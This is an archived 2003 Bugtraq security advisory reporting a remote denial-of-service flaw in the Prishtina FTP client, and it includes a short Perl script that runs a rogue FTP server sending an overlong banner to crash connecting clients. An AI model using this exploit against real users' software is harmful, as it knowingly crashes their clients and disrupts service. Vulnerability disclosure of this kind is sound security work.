[<prev] [next>] [day] [month] [year] [list]
Message-ID: <12411537119.20030521205851@mail.ru>
Date: Wed, 21 May 2003 20:58:51 -0700
From: D4rkGr3y <grey_1999@...l.ru>
To: bugtraq@...urity.nnov.ru, bugtraq@...urityfocus.com
Subject: Prishtina FTP v.1.*: remote DoS
-----BEGIN PGP SIGNED MESSAGE-----
###############################################################*
# Damage Hacking Group security advisory
# www.dhgroup.org
###############################################################*
#Product: Prishtina FTP v.1.*
#Authors: G.Syla [www.prishtina-soft.com]
#Vulnerability: remote DoS
###############################################################*
#Overview#------------------------------------------------------#
Just ftp client..
#Problem#-------------------------------------------------------#
It's possible to crash ftp-client by sending long ftp-banner to
it.
#Exploit#-------------------------------------------------------#
#!/usr/bin/perl
use IO::Socket;
$host = "localhost";
$port = "21";
$server = IO::Socket::INET->new(LocalPort => $port, Type =>
SOCK_STREAM,
Reuse => 1, Listen => 2) or die "Couldn't create tcp-server.\n";
$data = "A";
$num = "50000";
$buf .= $data x $num;
while ($client = $server->accept()) {
print "OK";
print $client "$buf\n";
close($client);
}
#wow#-----------------------------------------------------------#
%$#@ www.dhgroup.org -=> opened English version! Come on in :)
#eof
Best regards www.dhgroup.org
D4rkGr3y icq 540981
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
iQCVAwUBPsxK9W4LIpseSJmPAQELvwQAt9Adn0/OjjP9tvOKL8UbyGRBacPS3Xrf
X0Q5ocG/coH4hH0E9iDtHItmM8XLkhnF66FiJeBBveTSooohS73Gl9T+MNwxdT1+
46V8SAuq0Jsz8oHTNgGJ2ZGx0E8+3rXCfmngJWSJ0SJaXcEg+a04uidLi74YN0yH
RqkMTrGenPI=
=3a5T
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists